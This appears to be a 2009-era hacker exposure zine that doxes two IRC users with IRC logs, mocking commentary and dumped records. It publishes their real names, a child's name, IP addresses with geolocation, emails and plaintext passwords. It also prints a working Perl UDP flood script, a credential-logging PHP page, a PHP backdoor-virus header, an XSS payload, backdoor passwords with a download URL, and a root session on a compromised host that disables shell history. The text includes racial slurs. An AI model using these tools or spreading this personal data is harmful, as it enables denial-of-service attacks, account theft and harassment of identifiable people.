[2:52pm] <+RCEg0d> on the keyboard?
[2:52pm] <~RoMeO> gotta get this shit fixed
[2:52pm] <~RoMeO> ah no, i did that only once
[2:52pm] <~RoMeO> lolol
[2:52pm] <+RCEg0d> hehe, u were worried thats why u couldnt sleep
[2:52pm] <~RoMeO> yea
[2:52pm] <~RoMeO> cant let this go far
[2:52pm] <+RCEg0d> yeah i did it a couple of times... bad experience
[2:52pm] <~RoMeO> it will fucking go nuts
[2:52pm] <+RCEg0d> especially when u wake up and have QWERTY writen on your forehead
[2:52pm] <~RoMeO> LOL
[2:52pm] <~RoMeO> happened to me only once
[2:53pm] <+RCEg0d> hahaha
[2:53pm] <~RoMeO> my dad woke me up
[2:53pm] <~RoMeO> that was
[11:01:44] * Joins: as'RoMeO (RoMeO@cloaked-1D0129D7.ownage.net)
[11:16:43] * Parts: as'Guest45609 (rsca@cloaked-BFBC7842.org)
[11:16:54] * Joins: as'KO9 (ollie@mudkipz.gov)
[11:16:54] * as'ChanServ sets mode: +v as'KO9
[11:17:29] <as'RoMeO> asta is sueing me :(
[11:17:59] <+as'KO9> wut?
[11:18:06] <as'RoMeO> this dude
[11:18:08] <as'RoMeO> came in #bhf
[11:18:12] <as'RoMeO> and was like
[11:18:16] <as'RoMeO> ' i am suing you for hacking asta'
[11:18:21] <as'RoMeO> -_-'
[11:18:31] <+as'KO9> oh noez
[11:18:34] <as'RoMeO> i know right
[11:18:56] <+as'KO9> go get the magnets and destroy your hdd!!1
[11:19:03] <+as'KO9> must destroy all evidence
[11:19:18] <as'RoMeO> i must
[11:19:55] <+as'KO9> EmErgE: so who broke the server?
[11:20:20] <as'RoMeO> it broked itself
[11:20:24] <as'RoMeO> it was like SIGFUCK
// sigdie(); vs fatal(); - http://www.securityfocus.com/bid/20241
[11:20:25] <as'RoMeO> and voom
[11:20:32] <as'RoMeO> boom*
[11:20:57] <+as'KO9> ;[
[11:22:01] <@as'EmErgE> KO9~ can't be sure, it just crashed out of the blue and came back up after working out with the provider
[11:22:14] * Joins: as'd4de (d4de@1.0.0.127.in-addr.arpa)
[11:22:14] * as'ChanServ sets mode: +v as'd4de
[11:26:51] <+as'KO9> EmErgE: weird
[11:26:59] <+as'KO9> they blatently pulled the power
[11:27:07] <+as'KO9> and when you spoke to them they were like 'o shi-'
[11:27:13] <as'RoMeO> xD
[11:27:17] <as'RoMeO> awknet does that
[11:27:23] <+as'KO9> heeeeeeeh
[11:27:26] <+as'KO9> don't get me started on awknet
[11:27:29] <as'RoMeO> lmao
[11:27:31] <+as'KO9> Jason is a fucking tosspot
[11:27:33] <as'RoMeO> do tell
[11:27:34] <as'RoMeO> LOL
[11:27:43] <+as'KO9> stole my money
[11:27:44] <as'RoMeO> oh
[11:27:44] <as'RoMeO> do tell
[11:27:53] <+as'KO9> I bought a 'ddos protected' server from him
[11:28:06] <+as'KO9> server was down for most of the 1 and a half i had it
[11:28:10] <+as'KO9> and he refused to help
[11:28:16] <as'RoMeO> ;(
[11:28:21] <+as'KO9> despite posting him ifconfig's with loads of overruns and shit
[11:28:32] <+as'KO9> denying it was a network problem when i had another box on his network
[11:28:44] <+as'KO9> which couldn't even contact my own one
[11:28:44] <+as'KO9> heh
[11:28:45] <as'RoMeO> lol
[11:28:46] <as'RoMeO> sucks
------------[ Advisory:
Vulnerable Software: wall on SSH protocol 1 && putty.exe
Found by: RoMeO && pimpinjg
Impact: Log bash cookies and massive lulz
------------[ PoC:
root@server~# wall "<script>alert(1)</script>"
http://i43.tinypic.com/21317c6.png
// root@mercedes ??
[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[14:53:42] <connection> RoMeO: now that you've had your fun
[14:53:46] <&RoMeO> :)
[14:53:53] <&RoMeO> i had the lulz of a life time
[14:53:53] <connection> feel like explaining integer underflows
[14:53:56] <&RoMeO> no
.____ ____ ___.____ __________ .___.__ .__
| | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____
| | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \
| |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/
|_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ >
\/ \/ \/ \/ \/ \/ \/ \/ PRESENTS
[ XSS in wall on SSH 1 / putty ]
Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying
alot to connect it to the internet but no use!
i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas?
you can email me at: romeo.haxxor@gmail.com
thanks../
Join Date: Jan 2007
Location: Saudi-Arabia
Posts: 6
Ref: http://forums.fedoraforum.org/showthread.php?t=146470
/*
If he can't install a modem then I don't see how he could hack his way out of a wet paper bag...
oh wait... he can't... he's a skiddie!
*/
Posted 30 May 2008 - 03:13 AM
I am glad you like the articles section :) , what about the code base tho? any comments on that maybe?
and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main
prios to improve are:
- Layout
- Submit sytem + articles / codes system.
all the articles and codes will be reformated to look at its best, etc....
@intimidat0r, I sure will :)
ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906
// Your first professional certification I presume?
DarkMindZ
tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking
group underground hackers security experts graphics tutorials learning
ref: http://www.urbandictionary.com/define.php?term=DarkMindZ
/*
Must suck to have two different conflicting personalities.
Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY)
*/
Facebook Lulz
-------------
Faisal Hourani
SocialInterview.com asked me "Name someone you wish you could date."
I answered ''Megan Fox. rawr''
November 15 at 3:56am via Social Interview <20> Interview Me
Faisal Hourani
SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?"
I answered ''She already checks out everything, everyday. Hi mom :]...''
November 15 at 10:06pm via Social Interview <20> View Feedback (2)Hide Feedback (2) <20> Interview Me
// We hope she checks this out:] Hai Faisal's mom
Faisal Hourani
SocialInterview.com asked me "If you could rule any country or place, what would you pick?"
I answered: "The world =O"
// You ever thought about Economical Crisis ?
Faisal Hourani they don't call me romeo for jack :P
Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE!
You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting
See More
July 6 at 7:00pm via How dateable are you? <20> View Feedback (2)Hide Feedback (2) <20> Take this Quiz
// rawr :] lulz
<EFBFBD>I can<61>t believe that out of 10,000 sperm, you were the quickest.<2E>
~ Steven Pearl
<?php // DarkMindZ.com
######################################
# [ DarkMindZ PHP.Virus v1.5 ] #
# [ RoMeO ] #
######################################
set_time_limit(0);
ignore_user_abort(1);
# root@darkmindz.com~ cat /home/pr0jects/virus/intro
# DMZ PHP.Virus, very simple PHP virus, that would do the following:
# |1| Look for all PHP files in directory.
# |2| Check if infected.
# |3| Infect with your backdoor.
# |4| Log all infected files, and optional mail them to you.
# root@darkmindz.com~ exit
# [ To-Do ] #
# Mass infector, infect other users on server.
# Better Reports, some system info reports too.
# Spreading, by RFI dorks.
# Polymorphism //Arxidia!
#[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]
// Careful not to infect yourself.. There is a polymorphic flu virus on the loose that spreads through RFI..
LoginLog By: RoMeO[DarkMindZ.com]
Login Log
<?php
##################################################
# LoginLog By: RoMeO[DarkMindZ.com]
##################################################
$saveinsql = 1; # shall we log it in SQL?
$table = "mylogs";
$passf = "passw0rd";
$usrfield = "usern4me";
$host = "localhost";
$usr = "roooooooot";
$pw = "w0000000t";
$sqldb = "whatever";
if($saveinsql) {
mysql_connect($host, $usr, $pw);
mysql_select_db($sqldb);
}
$username = $_GET["u"];
$password = $_GET["p"];
function logit($user, $pass) {
$file = fopen('_my_log.txt', 'w');
fwrite($file, "$user:$pass\n");
fclose($file);
}
function mysqlentry($table, $pass, $user) {
$check1 = "SELECT * FROM `$table` WHERE $userf = '$user'";
$query1 = mysql_query($check1);
if (!mysql_num_rows($query1) {
$ok = "INSERT INTO `$table` (`$userf`, `$passf`) VALUES ('$user', '$pass')";
mysql_query($ok);
}
else { $update = "UPDATE $table SET $passf = '$pass' WHERE $userf = '$user'";
mysql_query($update);
}
mysql_close;
}
if(isset($username) && isset($password)) {
logit($username, $password);
mysqlentry($table, $password, $username);
}
?>
ref: http://nepalimadbulls.wetpaint.com/page/Login+Log
// As a skiddie, you are NOT supposed to know how to secure your own code..
(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL)
(5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down')
IP address: 77.30.170.77
Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa.
Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist]
ASN: 25019
ASN Name: SAUDINETSTC-AS
IP range connectivity: 5
Registrar (per ASN): RIPE
Country (per IP registrar): SA [Saudi Arabia]
Country Currency: SAR [Saudi Arabia Riyals]
Country IP Range: 77.30.0.0 to 77.31.255.255
Country fraud profile: Normal
City (per outside source): Riyadh, Ar Riyad
Country (per outside source): SA [Saudi Arabia]
Private (internal) IP? No
IP address registrar: whois.arin.net
Known Proxy? No
Link for WHOIS: 77.30.170.77
(23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),(
IP address: 89.5.78.7
Reverse DNS: dynamic.dsl.nesma.net.sa.
Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist]
ASN: 24731
ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA))
IP range connectivity: 1
Registrar (per ASN): RIPE
Country (per IP registrar): SA [Saudi Arabia]
Country Currency: SAR [Saudi Arabia Riyals]
Country IP Range: 89.4.0.0 to 89.5.255.255
Country fraud profile: Normal
City (per outside source): Riyadh, Ar Riyad
Country (per outside source): SA [Saudi Arabia]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No
Link for WHOIS: 89.5.78.7
ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt
----- darkmindz.com -----
-----------------
Host's addresses:
-----------------
darkmindz.com. 5 IN A 69.42.209.54
-------------
Name servers:
-------------
ns6.hr-development.net. 5 IN A 69.42.209.51
ns5.hr-development.net. 5 IN A 69.42.209.50
-----------
MX record:
-----------
aspmx.l.google.com. 5 IN A 209.85.219.58
---------------------
Trying Zonetransfers:
---------------------
trying zonetransfer for darkmindz.com on ns6.hr-development.net ...
trying zonetransfer for darkmindz.com on ns5.hr-development.net ...
------------------------------
Brute forcing with dns.txt:
------------------------------
ftp.darkmindz.com. 5 IN A 69.42.209.54
mail.darkmindz.com. 5 IN A 69.42.209.54
pop.darkmindz.com. 5 IN A 69.42.209.54
smtp.darkmindz.com. 5 IN A 69.42.209.54
www.darkmindz.com. 5 IN A 69.42.209.54
-------------------------------
darkmindz.com c class netranges:
-------------------------------
69.42.209.0/24
----- cybershade.org -----
-----------------
Host's addresses:
-----------------
cybershade.org. 5 IN A 69.42.209.54
-------------
Name servers:
-------------
ns6.hr-development.net. 5 IN A 69.42.209.51
ns5.hr-development.net. 5 IN A 69.42.209.50
-----------
MX record:
-----------
mail.cybershade.org. 5 IN A 69.42.209.54
---------------------
Trying Zonetransfers:
---------------------
trying zonetransfer for cybershade.org on ns6.hr-development.net ...
trying zonetransfer for cybershade.org on ns5.hr-development.net ...
------------------------------
Brute forcing with dns.txt:
------------------------------
ftp.cybershade.org. 5 IN A 69.42.209.54
mail.cybershade.org. 5 IN A 69.42.209.54
pop.cybershade.org. 5 IN A 69.42.209.54
smtp.cybershade.org. 5 IN A 69.42.209.54
www.cybershade.org. 5 IN A 69.42.209.54
-------------------------------
cybershade.org c class netranges:
-------------------------------
69.42.209.0/24
2) pimpinjg
Real Name: Jason
Country: United States
State: California
Address:
Age: 38
Birthday: July 18, 1971
Daughter Name: Dakota
Phone Number:
Nickname: pimpinjg
MSN: pimpinjg@hr-development.net
ICQ: 574404127
Skype: pimpinjg
Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org
ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255
Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net
Domain Hosting: hr-development.net
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
Company: hr-development.net
Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_
PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206)
Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS
Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1,
Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227
Common Bash Commands: nano, wget :D
IRC Friends: RoMeO, garrett
Affiliates: thedefaced.org, darkmindz.com
Operating System(s): Ubuntu 8.10, Windows Vista
-
pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg
pimpinjg is using modes +iwrxt
pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182
pimpinjg is a registered nick
pimpinjg on #underground_systems #astalavista &#darkmindz
pimpinjg using twofish.securitychat.org SecurityChat.org ircd
pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02
pimpinjg End of /WHOIS list.
/******************************************************************************************
* pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;)
*
*
* New Mods (added by me) --
+--------------------------------------------------------+
* added proxy shit
* removed images for less crap in the logs
* added cpanel finder (thx to ackit)
* added rfi/lfi finder (thx to ackit)
* other shit i cba putting here
+--------------------------------------------------------+
* shit to remove --
+--------------------------------------------------------+
* - a bunch of stupid code things (example: echo("$msg"); (wtf... :S))
*********************************************************/
// Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore..
H4ckinab0x.com on 2008-03-12 - Domain History
Registrant:
project-h4x0r
430 west imperial highway 16
brea, California 92821
United States
Domain Name: H4CKINAB0X.COM
Created on: 11-Mar-08
Expires on: 11-Mar-09
Last Updated on: 11-Mar-08
Administrative Contact:
Gleason, rex pimpinjg4@aol.com
project-h4x0r
430 west imperial highway 16
brea, California 92821
United States
(714) 529-4264 Fax --
Project-h4x0r.com on 2008-02-16 - Domain History
Registrant:
project-h4x0r
432 west imperial highway 16
brea, California 92821
United States
Domain Name: PROJECT-H4X0R.COM
Created on: 13-Feb-08
Expires on: 14-Feb-10
Last Updated on: 14-Feb-08
Administrative Contact:
gleason, joshua pimpinjg4@aol.com
project-h4x0r
432 west imperial highway 16
brea, California 92821
United States
(714) 529-4234 Fax --
Teamhbx.com on 2008-09-05 - Domain History
Registrant:
h4ckinab0x
234 nigger street
nigger, California 11111
United States
Domain Name: TEAMHBX.COM
Created on: 03-Sep-08
Expires on: 03-Sep-09
Last Updated on: 03-Sep-08
Administrative Contact:
nigger, nigger pimpinjg4@aol.com
h4ckinab0x
234 nigger street
nigger, California 11111
United States
111111111 Fax --
Afraid.org Domains:
h4ckinab0x.com
(5 hosts in use) website private pimpinjg 192 days ago (01/22/2009)
copyandpaste.info
(7 hosts in use) website private pimpinjg 66 days ago (05/28/2009)
super-syn.net
(6 hosts in use) website private pimpinjg 1 day ago (08/02/2009)
anti-sec.net
(6 hosts in use) website private pimpinjg 2 days ago (07/05/2009)
Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q=
// It's amazing what u can find on the net..
pimpinjg
im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator
(wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup
Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0
// How's that going for you? Managed to start your "whitehat" security company? lulz
pimpinjg
Posted 19 October 2008 - 02:05 PM
i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable
in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a
couple warez sites wont release the urls cuz advertising so yeah sup :)
ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html
// 8 months? Is this a bad joke or a tragedy?
pimpinjg
is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload
till i get a good backup..
ref: http://forum.configserver.com/showthread.php?p=4535
// Did your lover backdoor you? Do you drop the soap on command now?
----- copyandpaste.info -----
-----------------
Host's addresses:
-----------------
copyandpaste.info. 5 IN A 76.175.20.182
-------------
Name servers:
-------------
ns2.afraid.org. 5 IN A 66.252.5.14
ns4.afraid.org. 5 IN A 67.18.179.15
ns3.afraid.org. 5 IN A 72.20.15.62
ns1.afraid.org. 5 IN A 67.19.72.206
-----------
MX record:
-----------
aspmx.l.google.com. 5 IN A 209.85.219.26
---------------------
Trying Zonetransfers:
---------------------
trying zonetransfer for copyandpaste.info on ns2.afraid.org ...
trying zonetransfer for copyandpaste.info on ns3.afraid.org ...
trying zonetransfer for copyandpaste.info on ns4.afraid.org ...
trying zonetransfer for copyandpaste.info on ns1.afraid.org ...
------------------------------
Brute forcing with dns.txt:
------------------------------
ftp.copyandpaste.info. 5 IN A 67.19.72.202
irc.copyandpaste.info. 5 IN A 94.102.58.212
mail.copyandpaste.info. 5 IN A 67.19.72.202
www.copyandpaste.info. 5 IN CNAME copyandpaste.info.
copyandpaste.info. 5 IN A 76.175.20.182
-------------------------------
copyandpaste.info c class netranges:
-------------------------------
67.19.72.0/24
76.175.20.0/24
94.102.58.0/24
WebHostingTalk Rumors
---------------------
* 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day
* 6/9/2009 7:38 am Astalavista got hacked
* 5/10/2009 9:15 am Post Your Server Uptime
ref: http://www.webhostingtalk.com/profile/HRDev%20Jason
// HR-Development.net the Anti-DDOS Specialist ? aka anti-sec?
HRDev Jason HRDev Jason is offline
View Beta Profile
New Member
Join Date: Mar 2009
Posts: 3
hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff?
ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877
// Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert?
Old 06-09-2009, 08:38 AM
HRDev Jason HRDev Jason is offline
View Beta Profile
New Member
Join Date: Mar 2009
Posts: 3
looks like the same hacker group striked again?
pastebin.com/m592e1f1c
i wonder what his obsession is with astalavista staff?
and from the looks of it he has a 0day grsecurity exploit too, its getting really bad
ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267
// Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on..
HRDev Jason HRDev Jason is offline
View Beta Profile
New Member
Join Date: Mar 2009
Posts: 3
This thread needs life! && bump
Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD
[root@mercedes ~]# uptime
07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01
[root@mercedes ~]#
ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336
<html>
<head>
<title>romeo@mercedes~$</title> // romeo.copyandpaste.info
</head>
<body bgcolor="black" text="gray" link="gray" alink="gray" vlink="gray">
<pre>
<strong>
__ .__
_____ ____ _/ |_ |__| ______ ____ ____
\__ \ / \\ __\| | / ___/_/ __ \_/ ___\
/ __ \_| | \| | | | \___ \ \ ___/\ \___
(____ /|___| /|__| |__|/____ > \___ >\___ >
\/ \/ # rm -rf / \/ \/ \/Movement
~ Fuck full-disclosure
~ Fuck the security industry
~ Keep 0days private
~ Hack everyone you can and then hack some more
</strong>
http://i43.tinypic.com/21317c6.png // [root@mercedes ~]#
/* It is clear that you and RoMeO was sharing the same hr-dev server with the following domains:
evilzone.ws
h4ckinab0x.com
hr-development.net
phone.addresses.com
phone.theyellowpages.com
aaasoda.com
beyond-comparison.com
hotglowneon.com
yourkicksonline.com
yourkicksonline.net
blitzcraze.com
blitzdownloads.com
bloohacks.com
bootforfun.com
crypticgamers.com
crypticgamers.net
darkmindz.com
furiogaming.net
godlymods.com
h3mod.com
h4ckinab0x.com
hackordie.net
halostrike.com
iexpl0it.net
mods4hire.com
mortonnetworks.com
oinfam0uso.com
pagewizzstudio.com
phylumstudios.com
samcraft.com
scionbot.com
snayke.com
softmodding.net
teamunix.org
theconsolejunkies.com
undergr0undhackers.com
vbcoderz.com
1nesolution.com
bootforfun.com
crypticgamers.net
cybershade.org
darkmindz.com
furiogaming.com
gotmovies.net
h3mod.com
halostrike.com
keytraderz.com
samcraft.com
sounddistrict.com
theconsolejunkies.com
*/
#!/usr/bin/perl
# udp
#flooder.pl coded by pimpinjg
print q{
====================================================
= =
= Coded By =
= =
= pimpinjg =
= =
= team h4ckinab0x =
= =
= h4ckinab0x.com =
= =
====================================================
};
use io::socket;
print "Host: ";
chop ($host = <stdin>);
print "Port: ";
chop ($port = <stdin>);
{
$sock = IO::Socket::INET->new (
PeerAddr => $host,
PeerPort => $port,
Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
}
packets:
while (1) {
$size = rand() * 200 * 2000;
print ("$host:$port packet size: $size\n");
send($sock, 0, $size);
}
ref: http://www.studentshangout.com/topic/99723-udp-flodder/
// anti-ddos specialist @ hr-dev..
_______ _______ ________
\ _ \ ___ __\ _ \ \_____ \
/ /_\ \\ \/ / /_\ \ _(__ <
\ \_/ \> <\ \_/ \/ \
\_____ /__/\_ \\_____ /______ /
\/ \/ \/ \/
__
______ _ ______ _____ ____ ____ ____ _____/ |_
/ _ \ \/ \/ / \\__ \ / ___\_/ __ \ / \_/ __ \ __\ ______
( <_> ) / | \/ __ \_/ /_/ > ___/ | | \ ___/| | /_____/
\____/ \/\_/|___| (____ /\___ / \___ > /\___| /\___ >__|
\/ \//_____/ \/ \/ \/ \/
__________ _________
\______ \_______ ____ / _____/ ____ ____
| ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
| | | | \( <_> ) \ ___/\ \___
|____| |__| \____/_______ /\___ >\___ >
\/ \/ \/
/*
Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
*/
This is a private computer system which is restricted to authorized individuals.
Actual or attempted unauthorized use of this computer system will result in criminal
and/or civil prosecution. This system is owned by Vitalspeeds Corporation of Wisconsin.
To purchase an account please visit us at http://www.vitalspeeds.com.
FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007
Welcome
to
___ ___ __ __ __ __
| | |__| |_.---.-.| |.-----.-----.-----.-----.--| |.-----.
| | | | _| _ || ||__ --| _ | -__| -__| _ ||__ --|
\_____/|__|____|___._||__||_____| __|_____|_____|_____||_____|
|__|
By entering or accessing this server, you hereby agree to the Acceptable
Use Policy and any other terms and conditions listed on our website.
Type 'vhosts' for a list of the virtual hosts that can be used on
this system. You can view this again by typing 'motd'.
Support can be obtained in #vitalspeeds on EFnet.
http://www.vitalspeeds.com/
Perm - All support requests should go through our Ticket system @
https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .
Commands: vhosts, BitchX
NOTE: Eggdrop/BNCS use ports over 35000.
April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of
service. Check your welcome email for user info etc.
+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more | // romeo.copyandpaste.info
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]
6:30PM up 518 days, 6:58, 2 users, load averages: 0.33, 0.26, 0.24
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 18:12 still logged in
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 17:00 - 17:39 (00:38)
katsst ttyp1 cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37 (00:30)
dark ftp modemcable089.1 Sun Jun 28 15:45 - 15:45 (00:00)
smash ttyp1 89.30.147.8 Sun Jun 28 15:30 - 15:50 (00:19)
[root@velocity:~]# w
6:30PM up 518 days, 6:58, 2 users, load averages: 0.43, 0.28, 0.25
USER TTY FROM LOGIN@ IDLE WHAT
romeo p0 :ttyp2:S.0 Thu11PM - irssi -h absolute.ownage.net
yaquis p1 ip72-223-92-235. 6:12PM - -bash (bash)
[root@velocity:~]# export HISTSIZE=0
[root@velocity:~]# export HISTFILE=/dev/null
[root@velocity:~]# env
TERM=vt100
SHELL=/usr/local/bin/bash
HISTSIZE=1500
SSH_CLIENT=1.3.3.7 6173 22
SSH_TTY=/dev/ttyp1
USER=root
SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
PAGER=more
LSCOLORS=ExGxFxf5CxfgDxabagacad
MAIL=/var/mail/root
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
PWD=/root
EDITOR=pico
PS1=[\u@\h:\w]\$
SHLVL=1
HOME=/root
LOGNAME=root
SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
HISTFILE=/dev/null
_=/usr/bin/env
[root@velocity:~]# w
7:36PM up 513 days, 8:04, 2 users, load averages: 0.43, 0.48, 0.43
USER TTY FROM LOGIN@ IDLE WHAT
romeo p9 :ttypf:S.0 Wed06AM 1 irssi -h absolute.ownage.net
pimpinjg pe cpe-76-175-20-18 Mon09PM 1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
[root@velocity:/]# date
Tue Jun 23 20:30:52 CDT 2009
[root@velocity:/]# uname -a
FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007 root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL i386
[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
hw.machine: i386
hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
hw.ncpu: 1
hw.machine_arch: i386
[root@velocity:~]# ls -la
total 72
drwxr-xr-x 6 root wheel 512 Jun 26 02:08 ./
drwxr-xr-x 21 root wheel 512 Nov 5 2008 ../
-rw------- 1 root wheel 4356 Jun 11 08:02 .bash_history
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
-rw------- 1 root wheel 5 Apr 15 2007 .history
drwx------ 2 root wheel 512 Jun 11 10:25 .irssi/
-rw-r--r-- 1 root wheel 143 Jan 12 2007 .k5login
-rw------- 1 root wheel 35 Jun 25 16:35 .lesshst
-rw-r--r-- 1 root wheel 293 Jan 12 2007 .login
-rw------- 1 root wheel 2164 Jun 23 20:21 .lsof_velocity
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
drwx------ 2 root wheel 512 Apr 13 2007 .ssh/
drwxr-xr-x 2 root wheel 512 Jun 24 18:00 kernels/
drwxr-xr-x 2 root wheel 512 Nov 5 2008 supfiles/
-rwxr--r-- 1 root wheel 477 Nov 5 2008 update.sh*
[root@velocity:~]# lsof -i -n | grep ssh
sshd 43929 devil 3u IPv4 0xca224000 0t0 TCP *:search (LISTEN)
sshd 43929 devil 5u IPv6 0xca6b5cb0 0t0 TCP *:search (LISTEN)
sshd 43929 devil 7u IPv4 0xca0653a0 0t0 TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
sshd 43929 devil 87u IPv4 0xcafd2570 0t0 TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
sshd 43929 devil 154u IPv4 0xc98913a0 0t0 TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
sshd 43929 devil 167u IPv4 0xcc5a73a0 0t0 TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
sshd 43929 devil 192u IPv4 0xcb023910 0t0 TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
sshd 60220 root 3u IPv4 0xc92c9000 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
